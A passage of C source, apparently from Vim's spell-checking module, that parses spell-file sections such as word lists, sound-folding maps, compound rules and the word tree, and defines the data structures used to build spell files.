smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = 0;
smp->sm_oneof_w = NULL;
smp->sm_to_w = NULL;
}
#endif
++gap->ga_len;
}
/* Fill the first-index table. */
set_sal_first(slang);
return 0;
}
/*
* Read SN_WORDS: <word> ...
* Return SP_*ERROR flags.
*/
static int
read_words_section(FILE *fd, slang_T *lp, int len)
{
int done = 0;
int i;
int c;
char_u word[MAXWLEN];
while (done < len)
{
/* Read one word at a time. */
for (i = 0; ; ++i)
{
c = getc(fd);
if (c == EOF)
return SP_TRUNCERROR;
word[i] = c;
if (word[i] == NUL)
break;
if (i == MAXWLEN - 1)
return SP_FORMERROR;
}
/* Init the count to 10. */
count_common_word(lp, word, -1, 10);
done += i + 1;
}
return 0;
}
/*
* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* Return SP_*ERROR flags.
*/
static int
read_sofo_section(FILE *fd, slang_T *slang)
{
int cnt;
char_u *from, *to;
int res;
slang->sl_sofo = TRUE;
/* <sofofromlen> <sofofrom> */
from = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
return cnt;
/* <sofotolen> <sofoto> */
to = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
{
vim_free(from);
return cnt;
}
/* Store the info in slang->sl_sal and/or slang->sl_sal_first. */
if (from != NULL && to != NULL)
res = set_sofo(slang, from, to);
else if (from != NULL || to != NULL)
res = SP_FORMERROR; /* only one of two strings is an error */
else
res = 0;
vim_free(from);
vim_free(to);
return res;
}
/*
* Read the compound section from the .spl file:
* <compmax> <compminlen> <compsylmax> <compoptions> <compflags>
* Returns SP_*ERROR flags.
*/
static int
read_compound(FILE *fd, slang_T *slang, int len)
{
int todo = len;
int c;
int atstart;
char_u *pat;
char_u *pp;
char_u *cp;
char_u *ap;
char_u *crp;
int cnt;
garray_T *gap;
if (todo < 2)
return SP_FORMERROR; /* need at least two bytes */
--todo;
c = getc(fd); /* <compmax> */
if (c < 2)
c = MAXWLEN;
slang->sl_compmax = c;
--todo;
c = getc(fd); /* <compminlen> */
if (c < 1)
c = 0;
slang->sl_compminlen = c;
--todo;
c = getc(fd); /* <compsylmax> */
if (c < 1)
c = MAXWLEN;
slang->sl_compsylmax = c;
c = getc(fd); /* <compoptions> */
if (c != 0)
ungetc(c, fd); /* be backwards compatible with Vim 7.0b */
else
{
--todo;
c = getc(fd); /* only use the lower byte for now */
--todo;
slang->sl_compoptions = c;
gap = &slang->sl_comppat;
c = get2c(fd); /* <comppatcount> */
todo -= 2;
ga_init2(gap, sizeof(char_u *), c);
if (ga_grow(gap, c) == OK)
while (--c >= 0)
{
((char_u **)(gap->ga_data))[gap->ga_len++] =
read_cnt_string(fd, 1, &cnt);
/* <comppatlen> <comppattext> */
if (cnt < 0)
return cnt;
todo -= cnt + 1;
}
}
if (todo < 0)
return SP_FORMERROR;
/* Turn the COMPOUNDRULE items into a regexp pattern:
* "a[bc]/a*b+" -> "^\(a[bc]\|a*b\+\)$".
* Inserting backslashes may double the length, "^\(\)$<Nul>" is 7 bytes.
* Conversion to utf-8 may double the size. */
c = todo * 2 + 7;
#ifdef FEAT_MBYTE
if (enc_utf8)
c += todo * 2;
#endif
pat = alloc((unsigned)c);
if (pat == NULL)
return SP_OTHERERROR;
/* We also need a list of all flags that can appear at the start and one
* for all flags. */
cp = alloc(todo + 1);
if (cp == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compstartflags = cp;
*cp = NUL;
ap = alloc(todo + 1);
if (ap == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compallflags = ap;
*ap = NUL;
/* And a list of all patterns in their original form, for checking whether
* compounding may work in match_compoundrule(). This is freed when we
* encounter a wildcard, the check doesn't work then. */
crp = alloc(todo + 1);
slang->sl_comprules = crp;
pp = pat;
*pp++ = '^';
*pp++ = '\\';
*pp++ = '(';
atstart = 1;
while (todo-- > 0)
{
c = getc(fd); /* <compflags> */
if (c == EOF)
{
vim_free(pat);
return SP_TRUNCERROR;
}
/* Add all flags to "sl_compallflags". */
if (vim_strchr((char_u *)"?*+[]/", c) == NULL
&& !byte_in_str(slang->sl_compallflags, c))
{
*ap++ = c;
*ap = NUL;
}
if (atstart != 0)
{
/* At start of item: copy flags to "sl_compstartflags". For a
* [abc] item set "atstart" to 2 and copy up to the ']'. */
if (c == '[')
atstart = 2;
else if (c == ']')
atstart = 0;
else
{
if (!byte_in_str(slang->sl_compstartflags, c))
{
*cp++ = c;
*cp = NUL;
}
if (atstart == 1)
atstart = 0;
}
}
/* Copy flag to "sl_comprules", unless we run into a wildcard. */
if (crp != NULL)
{
if (c == '?' || c == '+' || c == '*')
{
vim_free(slang->sl_comprules);
slang->sl_comprules = NULL;
crp = NULL;
}
else
*crp++ = c;
}
if (c == '/') /* slash separates two items */
{
*pp++ = '\\';
*pp++ = '|';
atstart = 1;
}
else /* normal char, "[abc]" and '*' are copied as-is */
{
if (c == '?' || c == '+' || c == '~')
*pp++ = '\\'; /* "a?" becomes "a\?", "a+" becomes "a\+" */
#ifdef FEAT_MBYTE
if (enc_utf8)
pp += mb_char2bytes(c, pp);
else
#endif
*pp++ = c;
}
}
*pp++ = '\\';
*pp++ = ')';
*pp++ = '$';
*pp = NUL;
if (crp != NULL)
*crp = NUL;
slang->sl_compprog = vim_regcomp(pat, RE_MAGIC + RE_STRING + RE_STRICT);
vim_free(pat);
if (slang->sl_compprog == NULL)
return SP_FORMERROR;
return 0;
}
/*
* Set the SOFOFROM and SOFOTO items in language "lp".
* Returns SP_*ERROR flags when there is something wrong.
*/
static int
set_sofo(slang_T *lp, char_u *from, char_u *to)
{
int i;
#ifdef FEAT_MBYTE
garray_T *gap;
char_u *s;
char_u *p;
int c;
int *inp;
if (has_mbyte)
{
/* Use "sl_sal" as an array with 256 pointers to a list of wide
* characters. The index is the low byte of the character.
* The list contains from-to pairs with a terminating NUL.
* sl_sal_first[] is used for latin1 "from" characters. */
gap = &lp->sl_sal;
ga_init2(gap, sizeof(int *), 1);
if (ga_grow(gap, 256) == FAIL)
return SP_OTHERERROR;
vim_memset(gap->ga_data, 0, sizeof(int *) * 256);
gap->ga_len = 256;
/* First count the number of items for each list. Temporarily use
* sl_sal_first[] for this. */
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
mb_cptr_adv(s);
if (c >= 256)
++lp->sl_sal_first[c & 0xff];
}
if (*p != NUL || *s != NUL) /* lengths differ */
return SP_FORMERROR;
/* Allocate the lists. */
for (i = 0; i < 256; ++i)
if (lp->sl_sal_first[i] > 0)
{
p = alloc(sizeof(int) * (lp->sl_sal_first[i] * 2 + 1));
if (p == NULL)
return SP_OTHERERROR;
((int **)gap->ga_data)[i] = (int *)p;
*(int *)p = 0;
}
/* Put the characters up to 255 in sl_sal_first[] the rest in a sl_sal
* list. */
vim_memset(lp->sl_sal_first, 0, sizeof(salfirst_T) * 256);
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
i = mb_cptr2char_adv(&s);
if (c >= 256)
{
/* Append the from-to chars at the end of the list with
* the low byte. */
inp = ((int **)gap->ga_data)[c & 0xff];
while (*inp != 0)
++inp;
*inp++ = c; /* from char */
*inp++ = i; /* to char */
*inp++ = NUL; /* NUL at the end */
}
else
/* mapping byte to char is done in sl_sal_first[] */
lp->sl_sal_first[c] = i;
}
}
else
#endif
{
/* mapping bytes to bytes is done in sl_sal_first[] */
if (STRLEN(from) != STRLEN(to))
return SP_FORMERROR;
for (i = 0; to[i] != NUL; ++i)
lp->sl_sal_first[from[i]] = to[i];
lp->sl_sal.ga_len = 1; /* indicates we have soundfolding */
}
return 0;
}
/*
* Fill the first-index table for "lp".
*/
static void
set_sal_first(slang_T *lp)
{
salfirst_T *sfirst;
int i;
salitem_T *smp;
int c;
garray_T *gap = &lp->sl_sal;
sfirst = lp->sl_sal_first;
for (i = 0; i < 256; ++i)
sfirst[i] = -1;
smp = (salitem_T *)gap->ga_data;
for (i = 0; i < gap->ga_len; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
/* Use the lowest byte of the first character. For latin1 it's
* the character, for other encodings it should differ for most
* characters. */
c = *smp[i].sm_lead_w & 0xff;
else
#endif
c = *smp[i].sm_lead;
if (sfirst[c] == -1)
{
sfirst[c] = i;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
int n;
/* Make sure all entries with this byte are following each
* other. Move the ones that are in the wrong position. Do
* keep the same ordering! */
while (i + 1 < gap->ga_len
&& (*smp[i + 1].sm_lead_w & 0xff) == c)
/* Skip over entry with same index byte. */
++i;
for (n = 1; i + n < gap->ga_len; ++n)
if ((*smp[i + n].sm_lead_w & 0xff) == c)
{
salitem_T tsal;
/* Move entry with same index byte after the entries
* we already found. */
++i;
--n;
tsal = smp[i + n];
mch_memmove(smp + i + 1, smp + i,
sizeof(salitem_T) * n);
smp[i] = tsal;
}
}
#endif
}
}
}
#ifdef FEAT_MBYTE
/*
* Turn a multi-byte string into a wide character string.
* Return it in allocated memory (NULL for out-of-memory)
*/
static int *
mb_str2wide(char_u *s)
{
int *res;
char_u *p;
int i = 0;
res = (int *)alloc(sizeof(int) * (mb_charlen(s) + 1));
if (res != NULL)
{
for (p = s; *p != NUL; )
res[i++] = mb_ptr2char_adv(&p);
res[i] = NUL;
}
return res;
}
#endif
/*
* Read a tree from the .spl or .sug file.
* Allocates the memory and stores pointers in "bytsp" and "idxsp".
* This is skipped when the tree has zero length.
* Returns zero when OK, SP_ value for an error.
*/
static int
spell_read_tree(
FILE *fd,
char_u **bytsp,
idx_T **idxsp,
int prefixtree, /* TRUE for the prefix tree */
int prefixcnt) /* when "prefixtree" is TRUE: prefix count */
{
int len;
int idx;
char_u *bp;
idx_T *ip;
/* The tree size was computed when writing the file, so that we can
* allocate it as one long block. <nodecount> */
len = get4c(fd);
if (len < 0)
return SP_TRUNCERROR;
if (len >= 0x3ffffff)
/* Invalid length, multiply with sizeof(int) would overflow. */
return SP_FORMERROR;
if (len > 0)
{
/* Allocate the byte array. */
bp = lalloc((long_u)len, TRUE);
if (bp == NULL)
return SP_OTHERERROR;
*bytsp = bp;
/* Allocate the index array. */
ip = (idx_T *)lalloc_clear((long_u)(len * sizeof(int)), TRUE);
if (ip == NULL)
return SP_OTHERERROR;
*idxsp = ip;
/* Recursively read the tree and store it in the array. */
idx = read_tree_node(fd, bp, ip, len, 0, prefixtree, prefixcnt);
if (idx < 0)
return idx;
}
return 0;
}
/*
* Read one row of siblings from the spell file and store it in the byte array
* "byts" and index array "idxs". Recursively read the children.
*
* NOTE: The code here must match put_node()!
*
* Returns the index (>= 0) following the siblings.
* Returns SP_TRUNCERROR if the file is shorter than expected.
* Returns SP_FORMERROR if there is a format error.
*/
static idx_T
read_tree_node(
FILE *fd,
char_u *byts,
idx_T *idxs,
int maxidx, /* size of arrays */
idx_T startidx, /* current index in "byts" and "idxs" */
int prefixtree, /* TRUE for reading PREFIXTREE */
int maxprefcondnr) /* maximum for <prefcondnr> */
{
int len;
int i;
int n;
idx_T idx = startidx;
int c;
int c2;
#define SHARED_MASK 0x8000000
len = getc(fd); /* <siblingcount> */
if (len <= 0)
return SP_TRUNCERROR;
if (startidx + len >= maxidx)
return SP_FORMERROR;
byts[idx++] = len;
/* Read the byte values, flag/region bytes and shared indexes. */
for (i = 1; i <= len; ++i)
{
c = getc(fd); /* <byte> */
if (c < 0)
return SP_TRUNCERROR;
if (c <= BY_SPECIAL)
{
if (c == BY_NOFLAGS && !prefixtree)
{
/* No flags, all regions. */
idxs[idx] = 0;
c = 0;
}
else if (c != BY_INDEX)
{
if (prefixtree)
{
/* Read the optional pflags byte, the prefix ID and the
* condition nr. In idxs[] store the prefix ID in the low
* byte, the condition index shifted up 8 bits, the flags
* shifted up 24 bits. */
if (c == BY_FLAGS)
c = getc(fd) << 24; /* <pflags> */
else
c = 0;
c |= getc(fd); /* <affixID> */
n = get2c(fd); /* <prefcondnr> */
if (n >= maxprefcondnr)
return SP_FORMERROR;
c |= (n << 8);
}
else /* c must be BY_FLAGS or BY_FLAGS2 */
{
/* Read flags and optional region and prefix ID. In
* idxs[] the flags go in the low two bytes, region above
* that and prefix ID above the region. */
c2 = c;
c = getc(fd); /* <flags> */
if (c2 == BY_FLAGS2)
c = (getc(fd) << 8) + c; /* <flags2> */
if (c & WF_REGION)
c = (getc(fd) << 16) + c; /* <region> */
if (c & WF_AFX)
c = (getc(fd) << 24) + c; /* <affixID> */
}
idxs[idx] = c;
c = 0;
}
else /* c == BY_INDEX */
{
/* <nodeidx> */
n = get3c(fd);
if (n < 0 || n >= maxidx)
return SP_FORMERROR;
idxs[idx] = n + SHARED_MASK;
c = getc(fd); /* <xbyte> */
}
}
byts[idx++] = c;
}
/* Recursively read the children for non-shared siblings.
* Skip the end-of-word ones (zero byte value) and the shared ones (and
* remove SHARED_MASK) */
for (i = 1; i <= len; ++i)
if (byts[startidx + i] != 0)
{
if (idxs[startidx + i] & SHARED_MASK)
idxs[startidx + i] &= ~SHARED_MASK;
else
{
idxs[startidx + i] = idx;
idx = read_tree_node(fd, byts, idxs, maxidx, idx,
prefixtree, maxprefcondnr);
if (idx < 0)
break;
}
}
return idx;
}
/*
* Reload the spell file "fname" if it's loaded.
*/
static void
spell_reload_one(
char_u *fname,
int added_word) /* invoked through "zg" */
{
slang_T *slang;
int didit = FALSE;
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
{
if (fullpathcmp(fname, slang->sl_fname, FALSE) == FPC_SAME)
{
slang_clear(slang);
if (spell_load_file(fname, NULL, slang, FALSE) == NULL)
/* reloading failed, clear the language */
slang_clear(slang);
redraw_all_later(SOME_VALID);
didit = TRUE;
}
}
/* When "zg" was used and the file wasn't loaded yet, should redo
* 'spelllang' to load it now. */
if (added_word && !didit)
did_set_spelllang(curwin);
}
/*
* Functions for ":mkspell".
*/
#define MAXLINELEN 500 /* Maximum length in bytes of a line in a .aff
and .dic file. */
/*
* Main structure to store the contents of a ".aff" file.
*/
typedef struct afffile_S
{
char_u *af_enc; /* "SET", normalized, alloc'ed string or NULL */
int af_flagtype; /* AFT_CHAR, AFT_LONG, AFT_NUM or AFT_CAPLONG */
unsigned af_rare; /* RARE ID for rare word */
unsigned af_keepcase; /* KEEPCASE ID for keep-case word */
unsigned af_bad; /* BAD ID for banned word */
unsigned af_needaffix; /* NEEDAFFIX ID */
unsigned af_circumfix; /* CIRCUMFIX ID */
unsigned af_needcomp; /* NEEDCOMPOUND ID */
unsigned af_comproot; /* COMPOUNDROOT ID */
unsigned af_compforbid; /* COMPOUNDFORBIDFLAG ID */
unsigned af_comppermit; /* COMPOUNDPERMITFLAG ID */
unsigned af_nosuggest; /* NOSUGGEST ID */
int af_pfxpostpone; /* postpone prefixes without chop string and
without flags */
int af_ignoreextra; /* IGNOREEXTRA present */
hashtab_T af_pref; /* hashtable for prefixes, affheader_T */
hashtab_T af_suff; /* hashtable for suffixes, affheader_T */
hashtab_T af_comp; /* hashtable for compound flags, compitem_T */
} afffile_T;
#define AFT_CHAR 0 /* flags are one character */
#define AFT_LONG 1 /* flags are two characters */
#define AFT_CAPLONG 2 /* flags are one or two characters */
#define AFT_NUM 3 /* flags are numbers, comma separated */
typedef struct affentry_S affentry_T;
/* Affix entry from ".aff" file. Used for prefixes and suffixes. */
struct affentry_S
{
affentry_T *ae_next; /* next affix with same name/number */
char_u *ae_chop; /* text to chop off basic word (can be NULL) */
char_u *ae_add; /* text to add to basic word (can be NULL) */
char_u *ae_flags; /* flags on the affix (can be NULL) */
char_u *ae_cond; /* condition (NULL for ".") */
regprog_T *ae_prog; /* regexp program for ae_cond or NULL */
char ae_compforbid; /* COMPOUNDFORBIDFLAG found */
char ae_comppermit; /* COMPOUNDPERMITFLAG found */
};
#ifdef FEAT_MBYTE
# define AH_KEY_LEN 17 /* 2 x 8 bytes + NUL */
#else
# define AH_KEY_LEN 7 /* 6 digits + NUL */
#endif
/* Affix header from ".aff" file. Used for af_pref and af_suff. */
typedef struct affheader_S
{
char_u ah_key[AH_KEY_LEN]; /* key for hashtab == name of affix */
unsigned ah_flag; /* affix name as number, uses "af_flagtype" */
int ah_newID; /* prefix ID after renumbering; 0 if not used */
int ah_combine; /* suffix may combine with prefix */
int ah_follows; /* another affix block should be following */
affentry_T *ah_first; /* first affix entry */
} affheader_T;
#define HI2AH(hi) ((affheader_T *)(hi)->hi_key)
/* Flag used in compound items. */
typedef struct compitem_S
{
char_u ci_key[AH_KEY_LEN]; /* key for hashtab == name of compound */
unsigned ci_flag; /* affix name as number, uses "af_flagtype" */
int ci_newID; /* affix ID after renumbering. */
} compitem_T;
#define HI2CI(hi) ((compitem_T *)(hi)->hi_key)
/*
* Structure that is used to store the items in the word tree. This avoids
* the need to keep track of each allocated thing, everything is freed all at
* once after ":mkspell" is done.
* Note: "sb_next" must be just before "sb_data" to make sure the alignment of
* "sb_data" is correct for systems where pointers must be aligned on
* pointer-size boundaries and sizeof(pointer) > sizeof(int) (e.g., Sparc).
*/
#define SBLOCKSIZE 16000 /* size of sb_data */
typedef struct sblock_S sblock_T;
struct sblock_S
{
int sb_used; /* nr of bytes already in use */
sblock_T *sb_next; /* next block in list */
char_u sb_data[1]; /* data, actually longer */
};
/*
* A node in the tree.
*/
typedef struct wordnode_S wordnode_T;
struct wordnode_S
{
union /* shared to save space */
{
char_u hashkey[6]; /* the hash key, only used while compressing */
int index; /* index in written nodes (valid after first
round) */
} wn_u1;
union /* shared to save space */
{
wordnode_T *next; /* next node with same hash key */
wordnode_T *wnode; /* parent node that will write this node */
} wn_u2;
wordnode_T *wn_child; /* child (next byte in word) */
wordnode_T *wn_sibling; /* next sibling (alternate byte in word,
always sorted) */
int wn_refs; /* Nr. of references to this node. Only
relevant for first node in a list of
siblings, in following siblings it is
always one. */
char_u wn_byte; /* Byte for this node. NUL for word end */
/* Info for when "wn_byte" is NUL.
* In PREFIXTREE "wn_region" is used for the prefcondnr.
* In the soundfolded word tree "wn_flags" has the MSW of the wordnr and
* "wn_region" the LSW of the wordnr. */
char_u wn_affixID; /* supported/required prefix ID or 0 */
short_u wn_flags; /* WF_ flags */
short wn_region; /* region mask */
#ifdef SPELL_PRINTTREE
int wn_nr; /* sequence nr for printing */
#endif
};
#define WN_MASK 0xffff /* mask relevant bits of "wn_flags" */
#define HI2WN(hi) (wordnode_T *)((hi)->hi_key)
/*
* Info used while reading the spell files.
*/
typedef struct spellinfo_S
{
wordnode_T *si_foldroot; /* tree with case-folded words */
long si_foldwcount; /* nr of words in si_foldroot */
wordnode_T *si_keeproot; /* tree with keep-case words */
long si_keepwcount; /* nr of words in si_keeproot */
wordnode_T *si_prefroot; /* tree with postponed prefixes */
long si_sugtree; /* creating the soundfolding trie */
sblock_T *si_blocks; /* memory blocks used */
long si_blocks_cnt; /* memory blocks allocated */
int si_did_emsg; /* TRUE when ran out of memory */
long si_compress_cnt; /* words to add before lowering
compression limit */
wordnode_T *si_first_free; /* List of nodes that have been freed during
compression, linked by "wn_child" field. */
long si_free_count; /* number of nodes in si_first_free */
#ifdef SPELL_PRINTTREE
int si_wordnode_nr; /* sequence nr for nodes */
#endif
buf_T *si_spellbuf; /* buffer used to store soundfold word table */
int si_ascii; /* handling only ASCII words */
int si_add; /* addition file */
int si_clear_chartab; /* when TRUE clear char tables */
int si_region; /* region mask */
vimconv_T si_conv; /* for conversion to 'encoding' */
int si_memtot; /* runtime memory used */
int si_verbose; /* verbose messages */
int si_msg_count; /* number of words added since last message */
char_u *si_info; /* info text chars or NULL */
int si_region_count; /* number of regions supported (1 when there
are no regions) */
char_u si_region_name[17]; /* region names; used only if
* si_region_count > 1) */
garray_T si_rep; /* list of fromto_T entries from REP lines */
garray_T si_repsal; /* list of fromto_T entries from REPSAL lines */
garray_T si_sal; /* list of fromto_T entries from SAL lines */
char_u *si_sofofr; /* SOFOFROM text */
char_u *si_sofoto; /* SOFOTO text */
int si_nosugfile; /* NOSUGFILE item found */
int si_nosplitsugs; /* NOSPLITSUGS item found */
int si_nocompoundsugs; /* NOCOMPOUNDSUGS item found */
int si_followup; /* soundsalike: ? */
int si_collapse; /* soundsalike: ? */
hashtab_T si_commonwords; /* hashtable for common words */
time_t si_sugtime; /* timestamp for .sug file */
int si_rem_accents; /* soundsalike: remove accents */
garray_T si_map; /* MAP info concatenated */
char_u *si_midword; /* MIDWORD chars or NULL */
int si_compmax; /* max nr of words for compounding */
int si_compminlen; /* minimal length for compounding */
int si_compsylmax; /* max nr of syllables for compounding */
int si_compoptions; /* COMP_ flags */
garray_T si_comppat; /* CHECKCOMPOUNDPATTERN items, each stored as
a string */
char_u *si_compflags; /* flags used for compounding */
char_u si_nobreak; /* NOBREAK */
char_u *si_syllable; /* syllable string */
garray_T si_prefcond; /* table with conditions for postponed
* prefixes, each stored as a string */
int si_newprefID; /* current value for ah_newID */
int si_newcompID; /* current value for compound ID */
} spellinfo_T;
static afffile_T *spell_read_aff(spellinfo_T *spin, char_u *fname);
static int is_aff_rule(char_u **items, int itemcnt, char *rulename, int mincount);
static void aff_process_flags(afffile_T *affile, affentry_T *entry);
static int spell_info_item(char_u *s);
static unsigned affitem2flag(int flagtype, char_u *item, char_u *fname, int lnum);
static unsigned get_affitem(int flagtype, char_u **pp);
static void process_compflags(spellinfo_T *spin, afffile_T *aff, char_u *compflags);
static void check_renumber(spellinfo_T *spin);
static int flag_in_afflist(int flagtype, char_u *afflist, unsigned flag);
static void aff_check_number(int spinval, int affval, char *name);
static void aff_check_string(char_u *spinval, char_u *affval, char *name);
static int str_equal(char_u *s1, char_u *s2);
static void add_fromto(spellinfo_T *spin, garray_T *gap, char_u *from, char_u *to);
static int sal_to_bool(char_u *s);
static void spell_free_aff(afffile_T *aff);
static int spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile);
static int get_affix_flags(afffile_T *affile, char_u *afflist);
static int get_pfxlist(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static void get_compflags(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static int store_aff_word(spellinfo_T *spin, char_u *word, char_u *afflist, afffile_T *affile, hashtab_T *ht, hashtab_T *xht, int condit, int flags, char_u *pfxlist, int pfxlen);
static int spell_read_wordfile(spellinfo_T *spin, char_u *fname);
static void *getroom(spellinfo_T *spin, size_t len, int align);
static char_u *getroom_save(spellinfo_T *spin, char_u *s);
static void free_blocks(sblock_T *bl);
static wordnode_T *wordtree_alloc(spellinfo_T *spin);
static int store_word(spellinfo_T *spin, char_u *word, int flags, int region, char_u *pfxlist, int need_affix);
static int tree_add_word(spellinfo_T *spin, char_u *word, wordnode_T *tree, int flags, int region, int affixID);
static wordnode_T *get_wordnode(spellinfo_T *spin);
static int deref_wordnode(spellinfo_T *spin, wordnode_T *node);
static void free_wordnode(spellinfo_T *spin, wordnode_T *n);
static void wordtree_compress(spellinfo_T *spin, wordnode_T *root);
static int node_compress(spellinfo_T *spin, wordnode_T *node, hashtab_T *ht, int *tot);
static int node_equal(wordnode_T *n1, wordnode_T *n2);
static int write_vim_spell(spellinfo_T *spin, char_u *fname);
static void clear_node(wordnode_T *node);
static int put_node(FILE *fd, wordnode_T *node, int idx, int regionmask, int prefixtree);
static void spell_make_sugfile(spellinfo_T *spin, char_u *wfname);
static int sug_filltree(spellinfo_T *spin, slang_T *slang);
static int sug_maketable(spellinfo_T *spin);
static int sug_filltable(spellinfo_T *spin, wordnode_T *node, int startwordnr, garray_T *gap);
static int offset2bytes(int nr, char_u *buf);
static void sug_write(spellinfo_T *spin, char_u *fname);
static void spell_message(spellinfo_T *spin, char_u *str);
static void init_spellfile(void);
/* In the postponed prefixes tree wn_flags is used to store the WFP_ flags,
* but it must be negative to indicate the prefix tree to tree_add_word().
* Use a negative number with the lower 8 bits zero. */
#define PFX_FLAGS -256
/* flags for "condit" argument of store_aff_word() */
#define CONDIT_COMB 1 /* affix must combine */
#define CONDIT_CFIX 2 /* affix must have CIRCUMFIX flag */
#define CONDIT_SUF 4 /* add a suffix for matching flags */
#define CONDIT_AFF 8 /* word already has an affix */
/*
* Tunable parameters for when the tree is compressed. See 'mkspellmem'.
*/
static long compress_start = 30000; /* memory / SBLOCKSIZE */
static long compress_inc = 100; /* memory / SBLOCKSIZE */
static long compress_added = 500000; /* word count */
/*
* Check the 'mkspellmem' option. Return FAIL if it's wrong.
* Sets "sps_flags".
*/
int
spell_check_msm(void)
{
char_u *p = p_msm;
long start = 0;
long incr = 0;
long added = 0;
if (!VIM_ISDIGIT(*p))
return FAIL;
/* block count = (value * 1024) / SBLOCKSIZE (but avoid overflow)*/
start = (getdigits(&p) * 10) / (SBLOCKSIZE / 102);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
incr = (getdigits(&p) * 102) / (SBLOCKSIZE / 10);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
added = getdigits(&p) * 1024;
if (*p != NUL)
return FAIL;
if (start == 0 || incr == 0 || added == 0 || incr > start)
return FAIL;
compress_start = start;
compress_inc = incr;
compress_added = added;
return OK;
}
#ifdef SPELL_PRINTTREE
/*
* For debugging the tree code: print the current tree in a (more or less)
* readable format, so that we can see what happens when adding a word and/or
* compressing the tree.
* Based on code from Olaf Seibert.
*/
#define PRINTLINESIZE 1000
#define PRINTWIDTH 6
#define PRINTSOME(l, depth, fmt, a1, a2) vim_snprintf(l + depth * PRINTWIDTH, \
PRINTLINESIZE - PRINTWIDTH * depth, fmt, a1, a2)
static char line1[PRINTLINESIZE];
static char line2[PRINTLINESIZE];
static char line3[PRINTLINESIZE];
static void
spell_clear_flags(wordnode_T *node)
{
wordnode_T *np;
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = FALSE;
spell_clear_flags(np->wn_child);
}
}
static void
spell_print_node(wordnode_T *node, int depth)
{
if (node->wn_u1.index)
{
/* Done this node before, print the reference. */
PRINTSOME(line1, depth, "(%d)", node->wn_nr, 0);
PRINTSOME(line2, depth, " ", 0, 0);
PRINTSOME(line3, depth, " ", 0, 0);
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
else
{
node->wn_u1.index = TRUE;
if (node->wn_byte != NUL)
{
if (node->wn_child != NULL)
PRINTSOME(line1, depth, " %c -> ", node->wn_byte, 0);
else
/* Cannot happen? */
PRINTSOME(line1, depth, " %c ???", node->wn_byte, 0);
}
else
PRINTSOME(line1, depth, " $ ", 0, 0);
PRINTSOME(line2, depth, "%d/%d ", node->wn_nr, node->wn_refs);
if (node->wn_sibling != NULL)
PRINTSOME(line3, depth, " | ", 0, 0);
else
PRINTSOME(line3, depth, " ", 0, 0);
if (node->wn_byte == NUL)
{
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
/* do the children */
if (node->wn_byte != NUL && node->wn_child != NULL)
spell_print_node(node->wn_child, depth + 1);
/* do the siblings */
if (node->wn_sibling != NULL)
{
/* get rid of all parent details except | */
STRCPY(line1, line3);
STRCPY(line2, line3);
spell_print_node(node->wn_sibling, depth);
}
}
}
static void
spell_print_tree(wordnode_T *root)
{
if (root != NULL)
{
/* Clear the "wn_u1.index" fields, used to remember what has been
* done. */
spell_clear_flags(root);
/* Recursively print the tree. */
spell_print_node(root, 0);
}
}
#endif /* SPELL_PRINTTREE */
/*
* Read the affix file "fname".
* Returns an afffile_T, NULL for complete failure.
*/
static afffile_T *
spell_read_aff(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
afffile_T *aff;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
#define MAXITEMCNT 30
char_u *(items[MAXITEMCNT]);
int itemcnt;
char_u *p;
int lnum = 0;
affheader_T *cur_aff = NULL;
int did_postpone_prefix = FALSE;
int aff_todo = 0;
hashtab_T *tp;
char_u *low = NULL;
char_u *fol = NULL;
char_u *upp = NULL;
int do_rep;
int do_repsal;
int do_sal;
int do_mapline;
int found_map = FALSE;
hashitem_T *hi;
int l;
int compminlen = 0; /* COMPOUNDMIN value */
int compsylmax = 0; /* COMPOUNDSYLMAX value */
int compoptions = 0; /* COMP_ flags */
int compmax = 0; /* COMPOUNDWORDMAX value */
char_u *compflags = NULL; /* COMPOUNDFLAG and COMPOUNDRULE
concatenated */
char_u *midword = NULL; /* MIDWORD value */
char_u *syllable = NULL; /* SYLLABLE value */
char_u *sofofrom = NULL; /* SOFOFROM value */
char_u *sofoto = NULL; /* SOFOTO value */
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return NULL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading affix file %s ..."), fname);
spell_message(spin, IObuff);
/* Only do REP lines when not done in another .aff file already. */
do_rep = spin->si_rep.ga_len == 0;
/* Only do REPSAL lines when not done in another .aff file already. */
do_repsal = spin->si_repsal.ga_len == 0;
/* Only do SAL lines when not done in another .aff file already. */
do_sal = spin->si_sal.ga_len == 0;
/* Only do MAP lines when not done in another .aff file already. */
do_mapline = spin->si_map.ga_len == 0;
/*
* Allocate and init the afffile_T structure.
*/
aff = (afffile_T *)getroom(spin, sizeof(afffile_T), TRUE);
if (aff == NULL)
{
fclose(fd);
return NULL;
}
hash_init(&aff->af_pref);
hash_init(&aff->af_suff);
hash_init(&aff->af_comp);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Convert from "SET" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
